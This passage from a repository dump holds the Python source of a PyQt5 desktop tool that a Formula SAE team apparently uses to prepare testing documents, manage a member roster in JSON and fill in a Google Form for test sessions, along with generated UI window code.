self.retranslateUi(attendee_list)\n QtCore.QMetaObject.connectSlotsByName(attendee_list)\n\n def retranslateUi(self, attendee_list):\n _translate = QtCore.QCoreApplication.translate\n attendee_list.setWindowTitle(_translate(\"attendee_list\", \"Attendee List\"))\n self.tree_attendee.setSortingEnabled(True)\n self.tree_attendee.headerItem().setText(0, _translate(\"attendee_list\", \"First Name\"))\n self.tree_attendee.headerItem().setText(1, _translate(\"attendee_list\", \"Last Name\"))\n self.tree_attendee.headerItem().setText(2, _translate(\"attendee_list\", \"Cell #\"))\n self.tree_attendee.headerItem().setText(3, _translate(\"attendee_list\", \"Waiver Signed\"))\n self.tree_attendee.headerItem().setText(4, _translate(\"attendee_list\", \"Roles\"))\n self.label_attendee_list.setText(_translate(\"attendee_list\", \"Attendee List:\"))\n self.btn_modify_member.setText(_translate(\"attendee_list\", \"Modify Member\"))\n self.btn_add_member.setText(_translate(\"attendee_list\", \"Add Member\"))\n self.btn_remove_member.setText(_translate(\"attendee_list\", \"Remove Member(s)\"))\n\n" }, { "alpha_fraction": 0.5588667988777161, "alphanum_fraction": 0.5676240921020508, "avg_line_length": 40.63673400878906, "blob_id": "ea0bc9f53cf67da696901af514f0de0f7529e2ba", "content_id": "3027dfcb31afce8f7b22cd21c6e428e11f1839b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 30603, "license_type": "no_license", "max_line_length": 161, "num_lines": 735, "path": "/main.py", "repo_name": "concordia-fsae/testing_doc_maker", "src_encoding": "UTF-8", "text": "'''Testing Doc Maker program, used to help speed up making testing docs for FSAE testing sessions'''\n\nimport sys\nfrom functools import partial\nimport json\nimport requests\n\nfrom PyQt5.QtCore import QRegExp, QDate, QTime\nfrom PyQt5.QtGui import QRegExpValidator\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QDialog\nfrom PyQt5.QtWidgets import QFileDialog, QMessageBox, QTreeWidgetItem\nfrom openpyxl import load_workbook\nfrom windows.homepage import Ui_MainWindow\nfrom windows.attendee import Ui_attendee_list\nfrom windows.member import Ui_member_mod\n\n\n### Form Response Vars\n\nFORM_ID = \"1FAIpQLSe1iCukrB_HYS1Dvl8rjtazTZyAza1ArFZ-d3HaE-5gXTyWKA\"\nFORM_RESP_URL = 
\"https://docs.google.com/forms/u/2/d/e/\" + FORM_ID + \"/formResponse\"\n\n\n### PyQT Section\n\nclass AppWindow(QMainWindow):\n '''Program Main Window'''\n def __init__(self):\n super(AppWindow, self).__init__()\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n self.attendee = AttendeeWindow(self)\n self.member = MemberWindow(self)\n\n # set date to today's date, and adjust minimum difference between start time and end time\n today = QDate.currentDate()\n self.ui.date_session.setDate(today)\n self.ui.date_session.setMinimumDate(today)\n self.ui.time_start.editingFinished.connect(self.min_end_time)\n\n # adjust initial visibility of labels\n self.ui.label_save_doc.setVisible(False)\n self.ui.label_create_roster.setVisible(False)\n self.ui.label_roster.setVisible(False)\n\n # map buttons to functions\n self.ui.btn_save_doc.clicked.connect(self.save_testing_doc_dialog)\n self.ui.btn_open_template.clicked.connect(self.open_testing_doc_dialog)\n self.ui.btn_submit_form.clicked.connect(self.submit_form)\n self.ui.btn_export.clicked.connect(self.export_general)\n self.ui.btn_import.clicked.connect(self.import_general)\n self.ui.btn_open_roster.clicked.connect(self.open_roster_dialog)\n self.ui.btn_create_roster.clicked.connect(self.create_roster_dialog)\n self.ui.btn_save_roster.clicked.connect(self.save_roster)\n self.ui.btn_close_roster.clicked.connect(self.close_roster)\n self.ui.btn_modify_attending.clicked.connect(self.open_attendee)\n self.ui.btn_add_member.clicked.connect(partial(self.member_window, \"add\"))\n self.ui.btn_modify_member.clicked.connect(partial(self.member_window, \"modify\"))\n self.ui.btn_remove_member.clicked.connect(self.remove_member)\n\n # map actions in roster to functions\n self.ui.tree_roster.itemActivated.connect(partial(self.member_window, \"modify\"))\n self.ui.tree_roster.itemSelectionChanged.connect(self.member_selected)\n self.ui.tree_roster.sortByColumn(0, 0)\n\n # map menubar actions to functions\n self.ui.actionOpen_Template_File.triggered.connect(self.open_testing_doc_dialog)\n self.ui.actionSave_Testing_Doc.triggered.connect(self.save_testing_doc_dialog)\n\n # define vars reltaed to loading files\n self.roster_file_path = None\n self.roster = {}\n self.doc_template_path = self.doc_template = self.pc01 = None\n self.pc02 = self.pc08 = None\n\n # define list of radio button groups, and link actions to functions\n self.radios = [self.ui.radio_type, self.ui.radio_loc]\n self.ui.radio_type.buttonClicked.connect(partial(self.process_radio_input))\n self.ui.radio_loc.buttonClicked.connect(partial(self.process_radio_input))\n\n # define lists of field categories\n self.alpha_fields = [self.ui.edit_requestor, self.ui.edit_lead, \\\n self.ui.edit_type_other, self.ui.edit_cat]\n self.alphanum_fields = [self.ui.edit_part, self.ui.edit_loc_other]\n self.num_fields = [self.ui.edit_doc_num]\n self.fields = self.alpha_fields + self.alphanum_fields + self.num_fields\n\n # link field focus events to the functions that process the data in them\n for field in self.fields:\n field.focusOutEvent = partial(self.process_input, field)\n field.focusInEvent = partial(self.reset_color, field)\n\n # assign regex to the alpha fields\n for field in self.alpha_fields:\n field.setValidator(QRegExpValidator(QRegExp(\"[a-zA-Z\\\\s]*\")))\n\n # assign regex to the alphanumeric fields\n for field in self.alphanum_fields:\n field.setValidator(QRegExpValidator(QRegExp(\"[a-zA-Z\\\\s\\\\d]*\")))\n\n # assign regex to the doc num field\n 
self.ui.edit_doc_num.setValidator(QRegExpValidator(QRegExp(\"[\\\\d]{5}\")))\n\n # show the main window\n self.show()\n\n\n def open_testing_doc_dialog(self):\n '''Start the \"open file\" dialog for selecting the testing doc template'''\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n file_name, _ = QFileDialog.getOpenFileName(self, \"Select Template File\", \\\n \"\", \"Excel Files (*.xlsx);;All Files (*)\", options=options)\n if file_name:\n try:\n self.doc_template_path = file_name\n self.doc_template = load_workbook(filename=self.doc_template_path)\n self.pc01 = self.doc_template['General Information']\n self.pc02 = self.doc_template['PC02 - Safety']\n self.pc08 = self.doc_template['PC08 - Personnel List']\n self.ui.file_path.setText(self.doc_template_path)\n\n except KeyError:\n QMessageBox.critical(self, \"Error in file\", \\\n \"The required sheets were not found in this file.\\n\"\\\n \"Check that this file matches the template.\")\n\n except IOError:\n QMessageBox.critical(self, \"Unable to open file\", \\\n \"There was an error opening \\\"%s\\\"\" % file_name)\n self.ui.label_roster.setText(\"Error opening file\")\n\n\n def save_testing_doc_dialog(self):\n '''Start the \"save file\" dialog for saving the completed testing doc'''\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n file_name, _ = QFileDialog.getSaveFileName(self, \"Save Testing Doc\", \\\n \"\", \"Excel File (*.xlsx);;All Files (*)\", options=options)\n if file_name:\n pass\n # TODO save the testing doc\n\n\n def open_roster_dialog(self):\n '''Start the \"open file\" dialog for selecting the roster file'''\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n file_name, _ = QFileDialog.getOpenFileName(self, \"Select Roster File\", \\\n \"\", \"JSON Files (*.json)\", options=options)\n if file_name:\n self.roster_file_path = file_name\n try:\n with open(self.roster_file_path, \"r\") as roster:\n\n try:\n self.roster = json.load(roster)\n except json.decoder.JSONDecodeError:\n pass\n\n if self.roster and not self.roster == {}:\n for member in self.roster:\n mem = self.roster[member]\n item = QTreeWidgetItem(\n [\n member, \\\n mem[\"first_name\"], \\\n mem[\"last_name\"], \\\n mem[\"cell_num\"] \\\n ])\n item.setCheckState(4, mem[\"waiver\"])\n item.setCheckState(5, mem[\"truck\"])\n item.setCheckState(6, mem[\"trailer\"])\n self.ui.tree_roster.addTopLevelItem(item)\n else:\n QMessageBox.information(self, \"Empty Roster\", \\\n \"Roster file contains no members\")\n\n ui = self.ui\n ui.label_roster.setText(self.roster_file_path)\n ui.label_roster.setVisible(True)\n ui.btn_open_roster.setText(\"Roster File Opened\")\n ui.btn_open_roster.setEnabled(False)\n ui.btn_create_roster.setEnabled(False)\n ui.btn_close_roster.setEnabled(True)\n ui.btn_save_roster.setEnabled(True)\n ui.btn_add_member.setEnabled(True)\n\n except TypeError:\n QMessageBox.critical(self, \"Improperly Formatted File\", \\\n \"The selected JSON file \" \\\n \"is corrupt or improperly formatted.\")\n\n except IOError:\n QMessageBox.critical(self, \"Unable to open file\", \\\n \"There was an error opening \\\"%s\\\"\" % file_name)\n self.ui.label_roster.setText(\"Error opening file\")\n\n\n def create_roster_dialog(self):\n '''Start the \"save file\" dialog for saving the roster'''\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n file_name, _ = QFileDialog.getSaveFileName(self, \"Create Roster File\", \\\n \"\", \"JSON File 
(*.json)\", options=options)\n if file_name:\n if not \".json\" in file_name.lower():\n file_name += \".json\"\n\n try:\n with open(file_name, \"w+\"):\n self.ui.label_roster.setText(self.roster_file_path)\n self.ui.label_roster.setVisible(True)\n self.ui.btn_open_roster.setText(\"Roster File Opened\")\n self.ui.btn_open_roster.setEnabled(False)\n self.ui.btn_create_roster.setEnabled(False)\n self.ui.btn_close_roster.setEnabled(True)\n self.ui.btn_save_roster.setEnabled(True)\n self.ui.btn_add_member.setEnabled(True)\n\n self.update_json()\n except IOError:\n QMessageBox.critical(self, \"Unable to open file\", \\\n \"There was an error opening \\\"%s\\\"\" % file_name)\n self.ui.label_create_roster.setText(\"Error creating Roster File\")\n\n\n def export_general_dialog(self):\n '''Start the \"save file\" dialog for saving the General Info template file'''\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n file_name, _ = QFileDialog.getSaveFileName(self, \"Save General Info\", \\\n \"\", \"JSON File (*.json)\", options=options)\n if file_name:\n if not \".json\" in file_name.lower():\n file_name += \".json\"\n self.ui.btn_export.setEnabled(False)\n return file_name\n\n\n def import_general_dialog(self):\n '''Start the \"open file\" dialog for selecting a General Info JSON file'''\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n file_name, _ = QFileDialog.getOpenFileName(self, \"Select Template File\", \\\n \"\", \"JSON Files (*.json)\", options=options)\n if file_name:\n try:\n with open(file_name, \"r\") as template_file:\n return json.load(template_file)\n except IOError:\n QMessageBox.critical(self, \"Couldn't open file\", \\\n \"Couldn't open %s file for reading\", file_name)\n else:\n return None\n\n\n def export_general(self):\n '''Export all the information from the General Info page\n for later re-importing'''\n if self.validate_input():\n return\n path = self.export_general_dialog()\n if path is None:\n return\n\n export = {}\n export[\"requestor\"] = self.ui.edit_requestor.text()\n export[\"lead\"] = self.ui.edit_lead.text()\n export[\"date\"] = self.ui.date_session.date().toString()\n export[\"start_time\"] = self.ui.time_start.time().toString()\n export[\"end_time\"] = self.ui.time_end.time().toString()\n export[\"type\"] = self.ui.radio_type.checkedButton().text()\n export[\"type_other\"] = self.ui.radio_type_other.text()\n export[\"loc\"] = self.ui.radio_loc.checkedButton().text()\n export[\"loc_other\"] = self.ui.radio_loc_other.text()\n export[\"part\"] = self.ui.edit_part.text()\n export[\"cat\"] = self.ui.edit_cat.text()\n export[\"doc_num\"] = self.ui.edit_doc_num.text()\n export[\"desc\"] = self.ui.edit_desc.toPlainText()\n\n try:\n with open(path, \"w+\") as export_file:\n json.dump(export, export_file)\n except IOError:\n QMessageBox.critical(self, \"Unable to write file\", \\\n \"There was an error writing \\\"%s\\\"\" % path)\n\n\n def import_general(self):\n '''Import all the information on the General Info page from\n a JSON file'''\n\n\n general = self.import_general_dialog()\n if general is None:\n return\n\n try:\n self.ui.edit_requestor.setText(general[\"requestor\"])\n self.ui.edit_lead.setText(general[\"lead\"])\n self.ui.date_session.setDate(QDate().fromString(general[\"date\"]))\n self.ui.time_start.setTime(QTime().fromString(general[\"start_time\"]))\n self.ui.time_end.setTime(QTime().fromString(general[\"end_time\"]))\n self.ui.radio_type_other.setText(general[\"type_other\"])\n 
self.ui.radio_loc_other.setText(general[\"loc_other\"])\n self.ui.edit_part.setText(general[\"part\"])\n self.ui.edit_cat.setText(general[\"cat\"])\n self.ui.edit_doc_num.setText(general[\"doc_num\"])\n self.ui.edit_desc.setText(general[\"desc\"])\n\n if general[\"type\"] == \"Dyno\":\n self.ui.radio_dyno.setChecked(True)\n elif general[\"type\"] == \"Track\":\n self.ui.radio_track.setChecked(True)\n else:\n self.ui.radio_type_other.setChecked(True)\n\n if general[\"loc\"] == \"Cage\":\n self.ui.radio_loc_cage.setChecked(True)\n elif general[\"loc\"] == \"Loading Dock\":\n self.ui.radio_loc_loading.setChecked(True)\n elif general[\"loc\"] == \"Casino\":\n self.ui.radio_loc_casino.setChecked(True)\n else:\n self.ui.radio_loc_other.setChecked(True)\n\n except KeyError:\n QMessageBox.critical(self, \"Improperly Formatted File\", \\\n \"The selected JSON file is corrupt or improperly formatted.\")\n\n self.validate_input()\n\n\n def save_roster(self):\n '''Save the roster file to disk'''\n self.update_json()\n\n with open(self.roster_file_path, \"w\") as roster:\n json.dump(self.roster, roster)\n\n self.ui.btn_save_roster.setEnabled(False)\n\n\n def update_json(self):\n '''Update the json var containing the roster'''\n self.roster = {}\n for item in range(0, self.ui.tree_roster.topLevelItemCount()):\n member = self.ui.tree_roster.topLevelItem(item)\n self.roster[member.text(0)] = {\"first_name\":member.text(1), \\\n \"last_name\":member.text(2), \\\n \"cell_num\":member.text(3), \\\n \"waiver\":member.checkState(4), \\\n \"truck\":member.checkState(5), \\\n \"trailer\":member.checkState(6)}\n\n\n def close_roster(self):\n '''Close the Roster File'''\n\n confirm = QMessageBox.warning(self, \"Closing Roster File\", \\\n \"Are you sure you want to close the Roster File?\\nAny unsaved changes will be lost.\", \\\n QMessageBox.Yes, QMessageBox.No)\n\n if confirm != 16384:\n return\n\n self.ui.btn_open_roster.setEnabled(True)\n self.ui.btn_open_roster.setText(\"Open Roster File\")\n self.ui.btn_create_roster.setEnabled(True)\n self.ui.label_roster.setVisible(False)\n\n for member in [self.ui.btn_close_roster, self.ui.btn_save_roster, \\\n self.ui.btn_add_member, self.ui.btn_modify_member, self.ui.btn_remove_member]:\n member.setEnabled(False)\n\n self.ui.tree_roster.clear()\n\n\n def member_window(self, purpose):\n '''Open the member add/modify window'''\n if purpose == \"add\":\n self.member.setWindowTitle(\"New Member\")\n self.member.ui.buttonBox.accepted.connect(self.save_member)\n self.member.ui.buttonBox.rejected.connect(self.add_cancel)\n self.member.show()\n elif purpose == \"modify\":\n tree = self.ui.tree_roster\n m = self.member.ui\n if len(tree.selectedItems()) == 1:\n selected = tree.selectedItems()[0]\n\n members = [m.edit_id, m.edit_first_name, m.edit_last_name, m.edit_number]\n for ind in enumerate(members):\n ind[1].setText(selected.text(ind[0]))\n\n for ind in enumerate([m.check_waiver, m.check_truck, m.check_trailer]):\n ind[1].setCheckState(selected.checkState(ind[0]+4))\n ind[1].setTristate(False)\n\n self.member.setWindowTitle(\"Modify Member\")\n m.buttonBox.accepted.connect(partial(self.save_member, selected))\n self.member.ui.buttonBox.rejected.connect(self.add_cancel)\n\n\n selected = tree.selectedItems()\n for member in [m.edit_id, m.edit_first_name, m.edit_last_name, m.edit_number]:\n member.setDisabled(False)\n\n for member in [m.check_waiver, m.check_truck, m.check_trailer]:\n member.setTristate(False)\n\n self.member.show()\n else:\n selected = tree.selectedItems()\n for member in [m.edit_id, m.edit_first_name, 
m.edit_last_name, m.edit_number]:\n member.setDisabled(True)\n\n for member in [m.check_waiver, m.check_truck, m.check_trailer]:\n member.setTristate(True)\n member.setCheckState(1)\n\n self.member.setWindowTitle(\"Modify Members\")\n m.buttonBox.accepted.connect(partial(self.save_member, selected))\n self.member.ui.buttonBox.rejected.connect(self.add_cancel)\n\n self.member.show()\n\n\n\n # def add_member(self):\n # '''Add a member to the roster'''\n # tree = self.ui.tree_roster\n # m = self.member.ui\n # complete = True\n # duplicate = False\n\n # e_mn = m.edit_id.text()\n # e_fn = m.edit_first_name.text()\n # e_ln = m.edit_last_name.text()\n # e_cn = m.edit_number.text()\n # c_w = m.check_waiver.isChecked()\n # c_tu = m.check_truck.isChecked()\n # c_tl = m.check_trailer.isChecked()\n # valid = [m.edit_id.hasAcceptableInput(), m.edit_number.hasAcceptableInput()]\n\n # if any(k in self.roster for k in (e_mn, e_cn)):\n # complete = False\n # duplicate = True\n\n # if not (valid[0] and valid[1]):\n # complete = False\n # QMessageBox.information(self, \"Value Error\", \\\n # \"Member ID or Phone Number is invalid.\")\n\n # if duplicate:\n # QMessageBox.information(self, \"Duplicate Found\", \\\n # \"Duplicate information found. Please double check all data.\")\n\n # if complete:\n # item = QTreeWidgetItem([e_mn, e_fn, e_ln, e_cn])\n # for check in enumerate([c_w, c_tu, c_tl]):\n # state = 2 if check[1] else 0\n # item.setCheckState(check[0]+4, state)\n\n # tree.addTopLevelItem(item)\n # self.update_json()\n # self.member.close()\n # self.member = MemberWindow(self)\n\n\n def save_member(self, member=\"\"):\n '''Save the member(s) that was/were modified'''\n m = self.member.ui\n if not isinstance(member, list):\n complete = True\n duplicate = False\n\n edits = [m.edit_id.text(), m.edit_first_name.text(), \\\n m.edit_last_name.text(), m.edit_number.text()]\n checks = [m.check_waiver.isChecked(), m.check_truck.isChecked(), \\\n m.check_trailer.isChecked()]\n\n valid = [m.edit_id.hasAcceptableInput(), m.edit_number.hasAcceptableInput()]\n\n if not isinstance(member, str):\n curr = self.roster.pop(edits[0])\n\n if any(k in self.roster for k in (edits[0], edits[1])):\n complete = False\n duplicate = True\n\n if not (valid[0] and valid[1]):\n complete = False\n QMessageBox.information(self, \"Value Error\", \\\n \"Member ID or Phone Number is invalid.\")\n\n if duplicate:\n QMessageBox.information(self, \"Duplicate Found\", \\\n \"Duplicate information found. 
Please double check all data.\")\n\n if complete:\n if isinstance(member, str):\n member = QTreeWidgetItem(edits)\n self.ui.tree_roster.addTopLevelItem(member)\n\n else:\n for data in enumerate(edits):\n member.setText(data[0], data[1])\n\n for check in enumerate(checks):\n state = 2 if check[1] else 0\n member.setCheckState(check[0]+4, state)\n\n\n self.update_json()\n self.member.close()\n self.member = MemberWindow(self)\n elif len(member) > 1:\n checks = [m.check_waiver.checkState(), m.check_truck.checkState(), \\\n m.check_trailer.checkState()]\n if any(k != 1 for k in checks):\n for mem in member:\n if checks[0] != 1:\n mem.setCheckState(4, checks[0])\n if checks[1] != 1:\n mem.setCheckState(5, checks[1])\n if checks[2] != 1:\n mem.setCheckState(6, checks[2])\n self.update_json()\n self.member.close()\n self.member = MemberWindow(self)\n\n\n def member_selected(self, dis=\"\"):\n '''Runs when the selection in the tree is changed'''\n if self.ui.tree_roster.selectedItems():\n self.ui.btn_modify_member.setEnabled(True)\n self.ui.btn_remove_member.setEnabled(True)\n else:\n self.ui.btn_modify_member.setEnabled(False)\n self.ui.btn_remove_member.setEnabled(False)\n\n self.ui.btn_save_roster.setEnabled(True)\n\n if len(self.ui.tree_roster.selectedItems()) > 1:\n self.ui.btn_modify_member.setText(\"Modify Members\")\n else:\n self.ui.btn_modify_member.setText(\"Modify Member\")\n\n\n def remove_member(self):\n '''Remove a member from the attendee list'''\n tree = self.ui.tree_roster\n for member in tree.selectedItems():\n tree.takeTopLevelItem(tree.indexOfTopLevelItem(member))\n self.update_json()\n\n\n def add_cancel(self):\n '''Action on cancelling member addition'''\n confirm = QMessageBox.warning(self, \"Unsaved Changes\", \\\n \"Are you sure you want to cancel?\", QMessageBox.Yes, QMessageBox.No)\n\n if confirm == 16384:\n self.member.close()\n self.member = MemberWindow(self)\n\n\n def process_radio_input(self, field=\"\"):\n '''Process the radio input'''\n self.ui.edit_loc_other.setEnabled(self.ui.radio_loc_other.isChecked())\n self.ui.edit_type_other.setEnabled(self.ui.radio_type_other.isChecked())\n\n if not self.ui.edit_type_other.isEnabled():\n self.ui.edit_type_other.setStyleSheet(\"\")\n\n if not self.ui.edit_loc_other.isEnabled():\n self.ui.edit_loc_other.setStyleSheet(\"\")\n\n for radio in self.radios:\n if radio.checkedButton() is None:\n for button in radio.buttons():\n button.setStyleSheet(\"background-color: rgb(255, 143, 145);\")\n else:\n for button in radio.buttons():\n button.setStyleSheet(\"\")\n\n self.ui.btn_save_doc.setEnabled(True)\n\n\n def process_input(self, field, dis):\n '''Process the user input when they finish editing the given'''\n if(field.text() == \"\" or field.text() == \" \"):\n field.setStyleSheet(\"background-color: rgb(255, 143, 145);\")\n else:\n field.setStyleSheet(\"\")\n\n self.ui.btn_save_doc.setEnabled(True)\n\n\n def reset_color(self, field, dis):\n '''Helper to reset the color of the given field'''\n field.setStyleSheet(\"\")\n\n\n def validate_input(self):\n '''Validate the information that the user has entered'''\n complete = True\n ### validate text entry fields\n for field in self.alpha_fields + self.alphanum_fields + [self.ui.edit_doc_num]:\n if(field.isEnabled() and (field.text() == \"\" \\\n or field.text() == \" \" \\\n or not field.hasAcceptableInput())):\n\n complete = False\n field.setStyleSheet(\"background-color: rgb(255, 143, 145);\")\n else:\n field.setStyleSheet(\"\")\n\n ### validate radio buttons\n for radio in 
self.radios:\n if radio.checkedButton() is None:\n for button in radio.buttons():\n button.setStyleSheet(\"background-color: rgb(255, 143, 145);\")\n\n self.process_radio_input()\n\n if complete:\n return 0\n\n return 1\n\n\n def submit_form(self):\n '''Submit the Google Form'''\n if self.validate_input():\n return\n other_type_resp = other_loc_resp = \"\"\n other_type = self.ui.radio_type.checkedButton().text()\n other_loc = self.ui.radio_loc.checkedButton().text()\n\n if self.ui.radio_type_other.isEnabled():\n other_type_resp = self.ui.edit_type_other.text()\n other_type = \"__other_option__\"\n elif self.ui.radio_loc_other.isEnabled():\n other_loc_resp = self.ui.edit_loc_other.text()\n other_loc = \"__other_option__\"\n\n submission = {\"entry.1000008\":\"Aero\", # team\n \"entry.1000011\":self.ui.edit_requestor.text(), # person submitting form\n \"entry.1000013_month\":self.ui.date_session.date().month(), # test session month\n \"entry.1000013_day\":self.ui.date_session.date().day(), # test session day\n \"entry.1000013_year\":self.ui.date_session.date().year(), # test session year\n \"entry.1000014_hour\":self.ui.time_start.time().hour(), # start time hour\n \"entry.1000014_minute\":self.ui.time_start.time().minute(), # start time minute\n \"entry.1000015_hour\":self.ui.time_end.time().hour(), # end time hour\n \"entry.1000015_minute\":self.ui.time_end.time().minute(), # end time minute\n \"entry.1000003.other_option_response\":other_type_resp, # set to self.ui.edit_type_other.text() if self.ui.radio_type_other.isEnabled()\n \"entry.1000003\":other_type, # set to the selected type radio button text\n \"entry.1000009.other_option_response\":other_loc_resp, # set to self.ui.edit_loc_other.text() if self.ui.radio_loc_other.isEnabled()\n \"entry.1000009\":other_loc, # set to the selected location radio button text\n \"entry.1000006\":self.ui.edit_lead.text(), # test lead\n \"entry.1000007\":\"attending\", # list of other members attending\n \"entry.1450814088\":self.ui.edit_doc_num.text(), # testing doc number\n \"entry.1000010\":\"\"} # additional info\n #requests.post(FORM_RESP_URL, submission)\n\n\n def min_end_time(self):\n '''Set the minimum end time when the start time changes'''\n min_end = self.ui.time_start.time()\n if self.ui.time_end.time().hour() < self.ui.time_start.time().hour() + 1:\n min_end.setHMS(min_end.hour() + 1, min_end.minute(), min_end.second())\n self.ui.time_end.setMinimumTime(min_end)\n\n\n def open_attendee(self):\n '''Open the attendee list window'''\n if self.ui.btn_close_roster.isEnabled():\n self.attendee.show()\n else:\n QMessageBox.information(self, \"Roster Not Open\", \\\n \"Please open a Roster first by going to the \\\"Roster Management\\\" tab.\")\n\nclass AttendeeWindow(QDialog):\n '''Attendee list dialog'''\n def __init__(self, parent):\n super(AttendeeWindow, self).__init__(parent)\n self.ui = Ui_attendee_list()\n self.ui.setupUi(self)\n\n self.ui.btn_add_member.clicked.connect(self.add_member)\n self.ui.btn_remove_member.clicked.connect(self.remove_member)\n self.ui.tree_attendee.clicked.connect(self.member_selected)\n\n\n def add_member(self):\n '''Add a member to the attendee list'''\n pass\n\n\n def member_selected(self):\n '''Runs when the selection in the tree is changed'''\n if len(self.ui.tree_attendee.selectedItems()) > 1:\n self.ui.btn_modify_member.setText(\"Modify Members\")\n else:\n self.ui.btn_modify_member.setText(\"Modify Member\")\n\n\n def remove_member(self):\n '''Remove a member from the attendee list'''\n tree = 
self.ui.tree_attendee\n for member in tree.selectedItems():\n tree.takeTopLevelItem(tree.indexOfTopLevelItem(member))\n\n\nclass MemberWindow(QDialog):\n '''Member add/modify dialog'''\n def __init__(self, parent):\n super(MemberWindow, self).__init__(parent)\n self.ui = Ui_member_mod()\n self.ui.setupUi(self)\n\n self.ui.edit_id.setValidator(QRegExpValidator(QRegExp(\"[\\\\d]{3}\")))\n self.ui.edit_first_name.setValidator(QRegExpValidator(QRegExp(\"[a-zA-Z\\\\s]*\")))\n self.ui.edit_last_name.setValidator(QRegExpValidator(QRegExp(\"[a-zA-Z\\\\s]*\")))\n self.ui.edit_number.setValidator(QRegExpValidator(QRegExp( \\\n \"^((\\\\+?(\\\\d{2}))\\\\s?)?((\\\\d{2})|(\\\\((\\\\d{2})\\\\))\\\\s?)?(\\\\d{3,15})(\\\\-(\\\\d{3,15}))?$\")))\n\n\n\nif __name__ == '__main__':\n APP = QApplication(sys.argv)\n W = AppWindow()\n W.show()\n sys.exit(APP.exec_())\n" }, { "alpha_fraction": 0.6890565752983093, "alphanum_fraction": 0.702641487121582, "avg_line_length": 54.97887420654297, "blob_id": "5b955a6c2e6cc623d7d08b94eec563636ea14564", "content_id": "6f25ad7ac71b3476b234e44e5d2085656f0157c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7950, "license_type": "no_license", "max_line_length": 108, "num_lines": 142, "path": "/windows/member.py", "repo_name": "concordia-fsae/testing_doc_maker", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file '.\\windows\\member_export.ui'\n#\n# Created by: PyQt5 UI code generator 5.11.3\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nclass Ui_member_mod(object):\n def setupUi(self, member_mod):\n member_mod.setObjectName(\"member_mod\")\n member_mod.resize(219, 213)\n self.gridLayout = QtWidgets.QGridLayout(member_mod)\n self.gridLayout.setObjectName(\"gridLayout\")\n self.formLayout = QtWidgets.QFormLayout()\n self.formLayout.setObjectName(\"formLayout\")\n self.label_id = QtWidgets.QLabel(member_mod)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_id.setFont(font)\n self.label_id.setObjectName(\"label_id\")\n self.formLayout.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.label_id)\n self.label_first_name = QtWidgets.QLabel(member_mod)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_first_name.setFont(font)\n self.label_first_name.setObjectName(\"label_first_name\")\n self.formLayout.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.label_first_name)\n self.label_last_name = QtWidgets.QLabel(member_mod)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_last_name.setFont(font)\n self.label_last_name.setObjectName(\"label_last_name\")\n self.formLayout.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.label_last_name)\n self.label_number = QtWidgets.QLabel(member_mod)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_number.setFont(font)\n self.label_number.setObjectName(\"label_number\")\n self.formLayout.setWidget(3, QtWidgets.QFormLayout.LabelRole, self.label_number)\n self.label_waiver = QtWidgets.QLabel(member_mod)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_waiver.setFont(font)\n self.label_waiver.setObjectName(\"label_waiver\")\n self.formLayout.setWidget(4, QtWidgets.QFormLayout.LabelRole, self.label_waiver)\n self.label_truck = QtWidgets.QLabel(member_mod)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_truck.setFont(font)\n self.label_truck.setObjectName(\"label_truck\")\n self.formLayout.setWidget(5, 
QtWidgets.QFormLayout.LabelRole, self.label_truck)\n self.edit_first_name = QtWidgets.QLineEdit(member_mod)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.edit_first_name.sizePolicy().hasHeightForWidth())\n self.edit_first_name.setSizePolicy(sizePolicy)\n self.edit_first_name.setMinimumSize(QtCore.QSize(0, 0))\n self.edit_first_name.setMaximumSize(QtCore.QSize(110, 16777215))\n self.edit_first_name.setStyleSheet(\"*[hasAcceptableInput=\\\"false\\\"] { background-color: red }\")\n self.edit_first_name.setObjectName(\"edit_first_name\")\n self.formLayout.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.edit_first_name)\n self.edit_last_name = QtWidgets.QLineEdit(member_mod)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.edit_last_name.sizePolicy().hasHeightForWidth())\n self.edit_last_name.setSizePolicy(sizePolicy)\n self.edit_last_name.setMinimumSize(QtCore.QSize(0, 0))\n self.edit_last_name.setMaximumSize(QtCore.QSize(110, 16777215))\n self.edit_last_name.setObjectName(\"edit_last_name\")\n self.formLayout.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.edit_last_name)\n self.edit_number = QtWidgets.QLineEdit(member_mod)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.edit_number.sizePolicy().hasHeightForWidth())\n self.edit_number.setSizePolicy(sizePolicy)\n self.edit_number.setMinimumSize(QtCore.QSize(0, 